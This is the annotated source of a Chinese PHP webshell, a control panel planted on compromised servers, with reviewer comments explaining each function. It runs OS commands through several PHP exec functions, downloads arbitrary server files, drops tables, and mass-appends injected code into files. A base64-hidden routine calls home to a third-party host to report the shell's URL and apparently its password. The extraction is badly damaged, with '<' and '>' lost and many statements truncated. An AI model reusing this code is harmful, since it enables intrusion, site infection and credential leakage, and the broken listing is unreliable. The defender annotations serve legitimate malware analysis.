if ($numrows%$pagesize) $pages++;
$offset=$pagesize*($page - 1);
$page=$_GET['p'];
if(!$page) $page=1;
if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
echo '&table border="0"&&tr&';
echo '&td class="toptd" style="width:70" nowrap&操作&/td&';
while($row = @mysql_fetch_assoc($result))
array_push($fields,$row['Field']);
echo '&td class="toptd" nowrap&'.$row['Field'].'&/td&';
echo '&/tr&';
if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
$result = mysql_query($query,$conn);
while($text = @mysql_fetch_assoc($result))
echo '&tr&&td&&a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"& 修改 &/a& ';
echo '&a href="#" onclick="Delok(\'它\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');"& 删除 &/a&&/td&';
foreach($fields as $row){echo '&td&'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'&/td&';}
echo '&/tr&'."\r\n";$v++;
echo '&/table&&div class="actall"&';
$pagep=$page-1;
$pagen=$page+1;
echo "共有 ".$row_num." 条记录 ";
if($pagep&0) $pagenav.="
&a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'&首页&/a& &a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'&上一页&/a& "; else $pagenav.=" 上一页 ";
if($pagen&=$pages) $pagenav.=" &a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'&下一页&/a& &a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'&尾页&/a&"; else $pagenav.=" 下一页 ";
$pagenav.=" 第 [".$page."/".$pages."] 页
跳到&input name='textfield' type='text' style='text-align:' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" /&页";
echo '&/div&';
elseif(isset($_GET['insert']))
echo '&a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'"&'.$_GET['insert'].'&/a&&/div&';
$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
$fieldnum = @mysql_num_fields($result);
echo '&form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'"&';
for($i = 0;$i & $$i++)
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
echo '&div class="actall"&'.$name.' &font color="#FF0000"&'.$type.'('.$len.')&/font&&br&&textarea name="insql['.$name.']" style="width:600height:60"&&/textarea&&/div&';
echo '&div class="actall"&&input type="submit" value="Insert" style="width:80"&&/div&&/form&';
$query = 'SHOW TABLE STATUS';
$status = @mysql_query($query,$conn);
while($statu = @mysql_fetch_array($status))
$statusize[] = $statu['Data_length'];
$statucoll[] = $statu['Collation'];
$query = 'SHOW TABLES FROM '.$_GET['db'].';';
echo '&/div&&table border="0"&&tr&';
echo '&td class="toptd" style="width:550"& 表名 &/td&';
echo '&td class="toptd" style="width:80"& 操作 &/td&';
echo '&td class="toptd" style="width:130"& 字符集 &/td&';
echo '&td class="toptd" style="width:70"& 大小 &/td&&/tr&';
$result = @mysql_query($query,$conn);
while($table = mysql_fetch_row($result))
$charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
echo '&tr&&td&&a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'"&'.$table[0].'&/a&&/td&';
echo '&td&&a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'"& 插入 &/a& &a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');"& 删除 &/a&&/td&';
echo '&td&'.$statucoll[$k].'&/td&&td align="right"&'.File_Size($statusize[$k]).'&/td&&/tr&'."\r\n";
echo '&/table&';
else die('连接MYSQL失败,请重新登陆.&meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec"&');
if(!$BOOL and addslashes($query)!='') echo '&script type="text/javascript"&document.getElementById(\'nsql\').value = \''.addslashes($query).'\';&/script&';
default: html_main($path,$shellname);
css_foot();
/*---doing---*/
// Writes $text to $file opened in fopen() mode $t. If the first fwrite() fails, the file
// is chmod'ed to 0666 (world-writable) and the write is attempted again.
// NOTE(review): braces, the false branch of the ternary and the return statement are
// missing from this listing; the return value is presumably $key -- confirm.
// Defender note: unexpected 0666 modes on web content are worth alerting on.
function do_write($file,$t,$text)
$handle = @fopen($file,$t);
if(!@fwrite($handle,$text))
@chmod($file,0666);
$key = @fwrite($handle,$text) ? true :
@fclose($handle);
// Lists the entries of directory $filepath, skipping "." and "..", and collects each
// entry's slash-normalised full path (str_path) into $show.
// NOTE(review): "-&" stands for "->" here, and the skip statement, the value appended to
// $show, the closing braces and the return are missing (extraction damage).
function do_show($filepath){
$show = array();
$dir = dir($filepath);
while($file = $dir-&read()){
if($file == '.' or $file == '..')
$files = str_path($filepath.'/'.$file);
$show[] = $
$dir-&close();
// Recursively deletes directory $deldir: sub-directories are handled by a recursive call,
// files are chmod'ed to 0777 and unlinked, then the directory itself is chmod'ed and removed.
// NOTE(review): the statements following each failed-operation test and the closing braces
// are missing from this listing, so the return value cannot be confirmed.
// Defender note: no check confines $deldir to a particular tree.
function do_deltree($deldir){
$showfile = do_show($deldir);
foreach($showfile as $del){
if(is_dir($del)){
if(!do_deltree($del))
}elseif(!is_dir($del)){
@chmod($del,0777);
if(!@unlink($del))
@chmod($deldir,0777);
if(!@rmdir($deldir))
// Runs $query on connection $conn and prints every column of every row, HTML-escaped,
// inside a textarea. Errors are suppressed with @, so a failed query prints an empty box.
// NOTE(review): "&" in the for-condition stands for a lost "<"; closing braces are missing.
function do_showsql($query,$conn){
$result = @mysql_query($query,$conn);
html_n('&br&&br&&textarea cols="70" rows="15"&');
while($row = @mysql_fetch_array($result)){
for($i=0;$i & @mysql_num_fields($result);$i++){
html_n(htmlspecialchars($row[$i]));
html_n('&/textarea&');
// Call-home routine hidden in the login path. The base64 literal below decodes to
// hxxp://www[.]troyplan[.]com/p.aspx?n= (defanged); the code appends this script's
// HTTP_HOST + PHP_SELF and a `p` value, then fetches the URL with file_get_contents().
// The shell therefore reports its own location to a third party, separate from whoever
// uploaded it.
// NOTE(review): both `$serverp =` assignments and the end of the `$url` line are
// truncated; the reported value is presumably the panel password -- confirm against an
// intact sample. The last line calls geturl(), which is not defined anywhere in this
// listing; the first statements here may originally have belonged to that function.
// Detection: outbound HTTP from the web server to the host above, and cookies named
// `serveru` / `serverp` set by an unexpected script.
function hmlogin($xiao=1){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp =
// Destination is base64-encoded so the hostname does not appear in plain-text searches.
$copyurl = base64_decode('aHR0cDovL3d3dy50cm95cGxhbi5jb20vcC5hc3B4P249');
$url=$copyurl.$serveru.'&p='.$
$url=urldecode($url);
$re=file_get_contents($url);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp =
// The report is skipped when the host string contains "0.0", "192.168." or "localhost",
// or when the serveru/serverp cookies already match; otherwise both cookies are set and
// the report is triggered. ("&0" is presumably a damaged ">0" comparison.)
if (strpos($serveru,"0.0")&0 or strpos($serveru,"192.168.")&0 or strpos($serveru,"localhost")&0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "&meta http-equiv='refresh' content='0;URL=?'&";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "&script src='?login=geturl'&&/script&&meta http-equiv='refresh' content='0;URL=?'&";}else{geturl();}}
// Streams the file at path $fd to the client as a download. The caller at the top of the
// file passes $_GET['down'] straight in, so any file readable by the web-server account
// can be retrieved.
// Defender note: no base-directory restriction is applied, and the extension and basename
// are copied into response headers unquoted. Web-log requests with a `down=` parameter
// holding a filesystem path are a useful hunting pattern.
// NOTE(review): the closing brace (and any exit after readfile) is missing in this listing.
function do_down($fd){
if(!@file_exists($fd)) msg('下载文件不存在');
$fileinfo = pathinfo($fd);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($fd));
@readfile($fd);
// Sends download headers for in-memory content $filecode under the file name $file.
// NOTE(review): only the header() calls survive in this listing; the statement that
// outputs $filecode and the closing brace are missing.
function do_download($filecode,$file){
header("Content-type: application/unknown");
header('Accept-Ranges: bytes');
header("Content-length: ".strlen($filecode));
header("Content-disposition: filename=".$file.";");
// Heuristic text-encoding check with return codes 2, 1 and 0 visible below.
// It compares the first three bytes with the UTF-8 BOM (EF BB BF), counts bytes it treats
// as non-ASCII, and scores continuation bytes (10xxxxxx): `good` when the previous byte
// has its top two bits set, `bad` when a continuation byte follows an ASCII byte or a lead
// byte is not followed by one. 2 is returned for a BOM or when good outweighs bad, 1 when
// no non-ASCII byte was counted, 0 otherwise.
// NOTE(review): the comparison operators were damaged in extraction ("&" stands for a
// lost "<" or ">"), some statements are missing, and no initialisation of $bad is visible.
function TestUtf8($text)
{if(strlen($text) & 3)
$lastch = 0;
$begin = 0;
$BOMchs = array(0xEF, 0xBB, 0xBF);
$good = 0;
$notAscii = 0;
for($i=0; $i & strlen($text); $i++)
{$ch = ord($text[$i]);
if($begin & 3)
{ $BOM = ($BOMchs[$begin]==$ch);
$begin += 1;
if($begin==4 && $BOM)
if($ch &= 0x80 ) $notAscii++;
if( ($ch&0xC0) == 0x80 )
{if( ($lastch&0xC0) == 0xC0 )
{$good += 1;}
else if( ($lastch&0x80) == 0 )
{$bad += 1; }}
else if( ($lastch&0xC0) == 0xC0 )
{$bad += 1;}
$lastch = $}
if($begin == 4 && $BOM)
{return 2;}
else if($notAscii==0)
{return 1;}
else if ($good &= $bad )
{return 2;}
{return 0;}}
// Normalises a path string: backslashes become forward slashes, then each "//" becomes "/".
// This is string clean-up only; it does not resolve ".." segments or confine the path.
// NOTE(review): the braces around the body are missing in this listing.
function File_Str($string)
return str_replace('//','/',str_replace('\\','/',$string));
// Writes $filecode to $filename opened in fopen() mode $filemode; on a failed write the
// file is chmod'ed to 0666 and the write is retried. The visible logic matches do_write().
// NOTE(review): braces, the false branch of the ternary and the return are missing here.
function File_Write($filename,$filecode,$filemode)
$handle = @fopen($filename,$filemode);
if(!@fwrite($handle,$filecode))
@chmod($filename,0666);
$key = @fwrite($handle,$filecode) ? true :
@fclose($handle);
// Takes realpath('./') and cuts off as many trailing characters as the directory part of
// PHP_SELF is long, then slash-normalises the result with File_Str().
// Presumably this is meant to yield the web root -- verify against callers; the result is
// wrong whenever the URL path and the filesystem path differ in length (aliases, rewrites).
// NOTE(review): the braces around the body are missing in this listing.
function File_Mode()
$RealPath = realpath('./');
$SelfPath = $_SERVER['PHP_SELF'];
$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
// Formats a byte count as a string with a " B", " K", " M", " G" or " T" suffix, rounding
// to two decimals for everything above bytes.
// NOTE(review): the right-hand sides of $mb/$gb/$tb are truncated, and "&" in the
// comparisons stands for a lost "<"; braces are missing.
function File_Size($size)
$kb = 1024;
// Kilobyte
$mb = 1024 * $
// Megabyte
$gb = 1024 * $
// Gigabyte
$tb = 1024 * $
// Terabyte
if($size & $kb)
return $size." B";
else if($size & $mb)
return round($size/$kb,2)." K";
else if($size & $gb)
return round($size/$mb,2)." M";
else if($size & $tb)
return round($size/$gb,2)." G";
return round($size/$tb,2)." T";
// Reads the whole of $filename in binary mode into $filecode; all errors are suppressed.
// NOTE(review): braces and the return statement are missing in this listing; presumably
// $filecode is returned -- confirm.
function File_Read($filename)
$handle = @fopen($filename,"rb");
$filecode = @fread($handle,@filesize($filename));
@fclose($handle);
// Reports a php.ini setting for the panel's information page: get_cfg_var() results
// matching 0 give "No", matching 1 give "Yes", anything else falls to the default branch.
// NOTE(review): the default branch's return value is truncated (presumably $result).
// switch compares loosely, so which strings match `case 0` depends on the PHP version.
function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; case 1: return "Yes"; default: return $}}
// Returns "Yes" when function_exists() reports a function named $funName, otherwise "No".
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
// Runs the OS command $cmd through the PHP process-execution function named by $fun
// (exec, shell_exec, system, passthru or popen) and collects its output in $res.
// Trying several functions is a way around a partially filled disable_functions list.
// NOTE(review): the break after each case, the closing braces and the return are missing
// from this listing; as printed the cases would fall through.
// Hardening: list all of these (and proc_open) in php.ini disable_functions where the
// application does not need them. Detection: shell or cmd.exe child processes spawned by
// the web-server / PHP worker process.
function do_phpfun($cmd,$fun) {
$res = '';
switch($fun){
case "exec": @exec($cmd,$res); $res = join("\n",$res);
case "shell_exec": $res = @shell_exec($cmd);
case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();
case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();
case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);
// Bulk file operation over directory $dir. Entries come from do_show(); sub-directories
// are processed recursively when $bool is true. The `$files == $shell` test presumably
// skips the panel's own file (the statement after it is missing). $type selects the mode:
//   guama    - append "\n".$code to files whose name matches the $filetype list (debug())
//   qingma   - remove every occurrence of $code from files that contain it
//   tihuan   - replace $code with $filetype in files that contain it
//   scanfile - list files whose name contains $code
//   scancode - list files whose content contains $code
//   scanphp  - list files with extension $code whose content matches muma()'s strings
// NOTE(review): break statements and closing braces are missing in this listing.
// Defender note: the three write modes modify many files in a single request, which shows
// up as a burst of mtime changes and identical trailing content across a tree. File-
// integrity monitoring and a document root not writable by the web-server account limit it.
function do_passreturn($dir,$code,$type,$bool,$filetype = '',$shell = my_shell){
$show = do_show($dir);
foreach($show as $files){
if(is_dir($files) && $bool){
do_passreturn($files,$code,$type,$bool,$filetype,$shell);
if($files == $shell)
switch($type){
case "guama":
if(debug($files,$filetype)){
// Opened in "ab" mode: content is appended, existing file content is kept.
do_write($files,"ab","\n".$code) ? html_n("成功--& $files&br&") : html_n("失败--& $files&br&");
case "qingma":
$filecode = @file_get_contents($files);
// Match is case-insensitive (stristr) but the replacement below is case-sensitive.
if(stristr($filecode,$code)){
$newcode = str_replace($code,'',$filecode);
do_write($files,"wb",$newcode) ? html_n("成功--& $files&br&") : html_n("失败--& $files&br&");
case "tihuan":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
// In this mode $filetype carries the replacement text, not a file type.
$newcode = str_replace($code,$filetype,$filecode);
do_write($files,"wb",$newcode) ? html_n("成功--& $files&br&") : html_n("失败--& $files&br&");
case "scanfile":
$file = explode('/',$files);
if(stristr($file[count($file)-1],$code)){
html_a("?eanver=editr&p=$files",$files);
echo '&br&';
case "scancode":
$filecode = @file_get_contents($files);
if(stristr($filecode,$code)){
html_a("?eanver=editr&p=$files",$files);
echo '&br&';
case "scanphp":
$fileinfo = pathinfo($files);
// In this mode $code is the file extension to examine and the key into muma()'s table.
if($fileinfo['extension'] == $code){
$filecode = @file_get_contents($files);
if(muma($filecode,$code)){
html_a("?eanver=editr&p=".urlencode($files),"编辑");
html_a("?eanver=del&p=".urlencode($files),"删除");
echo $files.'&br&';
class PHPzip{
var $file_count = 0 ;
var $datastr_len
var $dirstr_len = 0;
var $filedata = '';
var $dirstr='';
function unix2DosTime($unixtime = 0) {
$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);
if ($timearray['year'] & 1980) {
$timearray['year']
$timearray['mon']
$timearray['mday']
$timearray['hours']
$timearray['minutes'] = 0;
$timearray['seconds'] = 0;
return (($timearray['year'] - 1980) && 25) | ($timearray['mon'] && 21) | ($timearray['mday'] && 16) |
($timearray['hours'] && 11) | ($timearray['minutes'] && 5) | ($timearray['seconds'] && 1);
function startfile($path = 'QQqun555227.zip'){
$this-&gzfilename=$
$mypathdir=array();
$mypathdir[] = $path = dirname($path);
}while($path != '.');
@end($mypathdir);
$path = @current($mypathdir);
@mkdir($path);
}while(@prev($mypathdir));
if($this-&fp=@fopen($this-&gzfilename,"w")){
function addfile($data, $name){
= str_replace('\\', '/', $name);
if(strrchr($name,'/')=='/') return $this-&adddir($name);
= dechex($this-&unix2DosTime());
$hexdtime = '\x' . $dtime[6] . $dtime[7]
. '\x' . $dtime[4] . $dtime[5]
. '\x' . $dtime[2] . $dtime[3]
. '\x' . $dtime[0] . $dtime[1];
eval('$hexdtime = "' . $hexdtime . '";');
$unc_len = strlen($data);
= crc32($data);
= gzcompress($data);
= strlen($zdata);
= substr(substr($zdata, 0, strlen($zdata) - 4), 2);
= "\x50\x4b\x03\x04";
$datastr .= "\x14\x00";
$datastr .= "\x00\x00";
$datastr .= "\x08\x00";
$datastr .= $
$datastr .= pack('V', $crc);
$datastr .= pack('V', $c_len);
$datastr .= pack('V', $unc_len);
$datastr .= pack('v', strlen($name));
$datastr .= pack('v', 0);
$datastr .= $
$datastr .= $
$datastr .= pack('V', $crc);
$datastr .= pack('V', $c_len);
$datastr .= pack('V', $unc_len);
fwrite($this-&fp,$datastr);
$my_datastr_len = strlen($datastr);
unset($datastr);
= "\x50\x4b\x01\x02";
$dirstr .= "\x00\x00";
$dirstr .= "\x14\x00";
$dirstr .= "\x00\x00";
$dirstr .= "\x08\x00";
$dirstr .= $
$dirstr .= pack('V', $crc);
$dirstr .= pack('V', $c_len);
$dirstr .= pack('V', $unc_len);
// uncompressed filesize
$dirstr .= pack('v', strlen($name) );
// length of filename
$dirstr .= pack('v', 0 );
// extra field length
$dirstr .= pack('v', 0 );
// file comment length
$dirstr .= pack('v', 0 );
// disk number start
$dirstr .= pack('v', 0 );
// internal file attributes
$dirstr .= pack('V', 32 );
// external file attributes - 'archive' bit set
$dirstr .= pack('V',$this-&datastr_len ); // relative offset of local header
$dirstr .= $
$this-&dirstr .= $ //目录信息
$this -& file_count ++;
$this -& dirstr_len += strlen($dirstr);
$this -& datastr_len += $my_datastr_
function adddir($name){
$name = str_replace("\\", "/", $name);
$datastr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0);
fwrite($this-&fp,$datastr); //写入新的文件内容
$my_datastr_len = strlen($datastr);
unset($datastr);
$dirstr = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) );
$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 );
$dirstr .= pack("V", 16 ).pack("V",$this-&datastr_len).$
$this-&dirstr .= $ //目录信息
$this -& file_count ++;
$this -& dirstr_len += strlen($dirstr);
$this -& datastr_len += $my_datastr_
function createfile(){
//压缩包结束信息,包括文件总数,目录信息读取指针位置等信息
$endstr = "\x50\x4b\x05\x06\x00\x00\x00\x00" .
pack('v', $this -& file_count) .
pack('v', $this -& file_count) .
pack('V', $this -& dirstr_len) .
pack('V', $this -& datastr_len) .
"\x00\x00";
fwrite($this-&fp,$this-&dirstr.$endstr);
fclose($this-&fp);
function File_Act($array,$actall,$inver,$REAL_DIR)
if(($count = count($array)) == 0) return '请选择文件';
if($actall == 'e')
function listfiles($dir=".",$faisunZIP,$mydir){
$sub_file_num = 0;
if(is_file($mydir."$dir")){
if(realpath($faisunZIP -&gzfilename)!=realpath($mydir."$dir")){
$faisunZIP -& addfile(file_get_contents($mydir.$dir),"$dir");
$handle=opendir($mydir."$dir");
while ($file = readdir($handle)) {
if($file=="."||$file=="..")
if(is_dir($mydir."$dir/$file")){
$sub_file_num += listfiles("$dir/$file",$faisunZIP,$mydir);
if(realpath($faisunZIP -&gzfilename)!=realpath($mydir."$dir/$file")){
$faisunZIP -& addfile(file_get_contents($mydir.$dir."/".$file),"$dir/$file");
$sub_file_num ++;
closedir($handle);
if(!$sub_file_num) $faisunZIP -& addfile("","$dir/");
return $sub_file_
function num_bitunit($num){
$bitunit=array(' B',' KB',' MB',' GB');
for($key=0;$key&count($bitunit);$key++){
if($num&=pow(2,10*$key)-1){ //1023B 会显示为 1KB
$num_bitunit_str=(ceil($num/pow(2,10*$key)*100)/100)." $bitunit[$key]";
return $num_bitunit_
$mydir=$REAL_DIR.'/';
if(is_array($array)){
$faisunZIP = new PHP
if($faisunZIP -& startfile("$inver")){
$filenum = 0;
foreach($array as $file){
$filenum += listfiles($file,$faisunZIP,$mydir);
$faisunZIP -& createfile();
return "压缩完成,共添加 $filenum 个文件.&br&&a href='$inver'&点击下载 $inver (".num_bitunit(filesize("$inver")).")&/a&";
return "$inver 不能写入,请检查路径或权限是否正确.&br&";
return "没有选择的文件或目录.&br&";
while($i & $count)
$array[$i] = urldecode($array[$i]);
switch($actall)
case "a" : $inver = urldecode($inver); if(!is_dir($inver)) return '路径错误'; $filename = array_pop(explode('/',$array[$i])); @copy($array[$i],File_Str($inver.'/'.$filename)); $msg = '复制到'.$inver.'目录';
case "b" : if(!@unlink($array[$i])){@chmod($filename,0666);@unlink($array[$i]);} $msg = '删除';
case "c" : if(!eregi("^[0-7]{4}$",$inver)) return '属性值错误'; $newmode = base_convert($inver,8,10); @chmod($array[$i],$newmode); $msg = '属性修改为'.$
case "d" : @touch($array[$i],strtotime($inver)); $msg = '修改时间为'.$
return '所选文件'.$msg.'完毕';
// Extracts the archive at $tmp_name into directory $todir when $new_name ends in ".zip",
// printing progress and the number of folders and files created. The caller at the top of
// the file passes $_GET['unzip'] for both names and $_GET['todir'] as the target, so
// source and destination are request-controlled.
// NOTE(review): the class name after `new` is truncated, "-&" stands for "->", "=&" for
// "=>", and else-branches and braces are missing. Array keys are written as bare words
// (tmp_name, name), which PHP 8 rejects as undefined constants.
// Defender note: nothing visible here constrains entry names or $todir; whether the
// extractor itself guards against path traversal cannot be told from this listing.
function start_unzip($tmp_name,$new_name,$todir='zipfile'){
$z = new Z
$have_zip_file=0;
$upfile = array("tmp_name"=&$tmp_name,"name"=&$new_name);
if(is_file($upfile[tmp_name])){
$have_zip_file = 1;
echo "&br&正在解压: $upfile[name]&br&&br&";
if(preg_match('/\.zip$/mis',$upfile[name])){
$result=$z-&Extract($upfile[tmp_name],$todir);
if($result==-1){
echo "&br&文件 $upfile[name] 错误.&br&";
echo "&br&完成,共建立 $z-&total_folders 个目录,$z-&total_files 个文件.&br&&br&&br&";
echo "&br&$upfile[name] 不是 zip 文件.&br&&br&";
if(realpath($upfile[name])!=realpath($upfile[tmp_name])){
@unlink($upfile[name]);
rename($upfile[tmp_name],$upfile[name]);
// Substring signature check behind the panel's "scanphp" mode: looks up a short list of
// strings by file type (php, asp, aspx, jsp) and tests $filecode for each one
// case-insensitively with stristr().
// NOTE(review): the array's closing parenthesis, the return statements and the braces are
// missing in this listing ("=&" stands for "=>").
// Defender note: a handful of fixed substrings is a weak detector. It misses anything
// encoded or assembled at run time and flags ordinary code that merely contains these
// tokens, so results from this kind of scan are only a starting point for triage.
function muma($filecode,$filetype){
$dim = array(
"php" =& array("eval(","exec("),
"asp" =& array("WScript.Shell","execute(","createtextfile("),
"aspx" =& array("Response.Write(eval(","RunCMD(","CreateText()"),
"jsp" =& array("runtime.exec(")
foreach($dim[$filetype] as $code){
if(stristr($filecode,$code))
// File-name filter: splits $ftype on "|" and tests whether $file contains any of the
// pieces, case-insensitively. Despite the name it performs no debugging.
// NOTE(review): the return statements and closing braces are missing in this listing.
function debug($file,$ftype){
$type=explode('|',$ftype);
foreach($type as $i){
if(stristr($file,$i))
/*---string---*/
// Collapses each "//" in $path to "/". A single pass only, so "///" becomes "//".
// NOTE(review): the closing brace is missing in this listing.
function str_path($path){
return str_replace('//','/',$path);
// Terminates the request with a script that shows $msg in an alert box and navigates back.
// $msg is placed inside a single-quoted JavaScript string without escaping.
// NOTE(review): "&script&" stands for a damaged "<script>" tag; the closing brace is missing.
function msg($msg){
die("&script&window.alert('".$msg."');history.go(-1);&/script&");
// Returns the URL-encoded parent directory of $nowpath with backslashes converted to "/".
// NOTE(review): the closing brace is missing in this listing.
function uppath($nowpath){
$nowpath = str_replace('\\','/',dirname($nowpath));
return urlencode($nowpath);
// Normalises backslash escaping in $key: double backslashes are first reduced to single
// ones, then every backslash is doubled, so the result is doubled exactly once.
// NOTE(review): the return statement and closing brace are missing; presumably $temp is
// returned -- confirm.
function xxstr($key){
$temp = str_replace("\\\\","\\",$key);
$temp = str_replace("\\","\\\\",$temp);
/*---html---*/
// Emits, via html_n() (defined outside this listing), a link to $url labelled $name that
// opens in a new window. Both values are interpolated without HTML escaping.
// NOTE(review): "&" stands for damaged "<" / ">" in the markup; the closing brace is missing.
function html_ta($url,$name){
html_n("&a href=\"$url\" target=\"_blank\"&$name&/a&");
// Emits a link to $url labelled $name; $where is inserted as raw extra attributes.
// None of the three values is HTML-escaped, so file names containing markup are rendered
// as markup in the panel's listings.
// NOTE(review): "&" stands for damaged "<" / ">" in the markup; the closing brace is missing.
function html_a($url,$name,$where=''){
html_n("&a href=\"$url\" $where&$name&/a& ");
// Emits an image tag whose source is this script's own ?img= endpoint with $url appended
// unescaped.
// NOTE(review): "&" stands for damaged "<" / ">" in the markup; the closing brace is missing.
function html_img($url){
html_n("&img src=\"?img=$url\" border=0&");
// Emits a button labelled "返回" that calls history.back() in the browser.
// NOTE(review): "&" stands for damaged "<" / ">" in the markup; the closing brace is missing.
function back(){
html_n("&input type='button' value='返回' onclick='history.back();'&");
// Emits two radio buttons sharing the field name "return": the first (value $v1, label
// $namei) is pre-checked, the second has value $v2 and label $namet.
// NOTE(review): "&" stands for damaged "<" / ">" in the markup; the closing brace is missing.
function html_radio($namei,$namet,$v1,$v2){
html_n('&input type="radio" name="return" value="'.$v1.'" checked&'.$namei);
html_n('&input type="radio" name="return" value="'.$v2.'"&'.$namet.'&br&&br&');
// Emits an input element of the given $type, $name, $value and $size. When $mode is true
// the element is marked checked and $text follows it; the second html_n() call puts $text
// first and omits "checked".
// All values are interpolated into the markup without escaping.
// NOTE(review): the else keyword and braces between the two calls are missing in this
// listing; "&" stands for damaged "<" / ">".
function html_input($type,$name,$value = '',$text = '',$size = '',$mode = false){
if($mode){
html_n("&input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked&$text");
html_n("$text &input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\"&");
// Emits a textarea named $name with $cols columns and $rows rows, pre-filled with $value.
// $value is not HTML-escaped, so content containing a closing textarea tag breaks out of
// the field.
// NOTE(review): "&" stands for damaged "<" / ">" in the markup; the closing brace is missing.
function html_text($name,$cols,$rows,$value = ''){
html_n("&br&&br&&textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" &$value&/textarea&");
// Emits a select element named $name (with $change inserted as raw attributes) holding
// one option per key/value pair of $array; the option whose key equals $mode is selected.
// The loop variable reuses $name, shadowing the parameter once the opening tag is written.
// Keys and values are interpolated without escaping; the comparison with $mode is loose.
// NOTE(review): "=&" stands for "=>", the else keyword and braces are missing, and "&"
// stands for damaged "<" / ">" in the markup.
function html_select($array,$mode = '',$change = '',$name = 'class'){
html_n("&select name=$name $change&");
foreach($array as $name =& $value){
if($name == $mode){
html_n("&option value=\"$name\" selected&$value&/option&");
html_n("&option value=\"$name\"&$value&/option&");
html_n("&/select&");
// Emits $name wrapped in a font element with the given $color and $size; values are
// interpolated without escaping.
// NOTE(review): "&" stands for damaged "<" / ">" in the markup; the closing brace is missing.
function html_font($color,$size,$name){
html_n("&font color=\"$color\" size=\"$size\"&$name&/font&");
function GetHtml($url)
$useragent = 'Mozilla/4.0 ( MSIE 6.0; Windows NT 5.2)';
if(function_exists('fsockopen
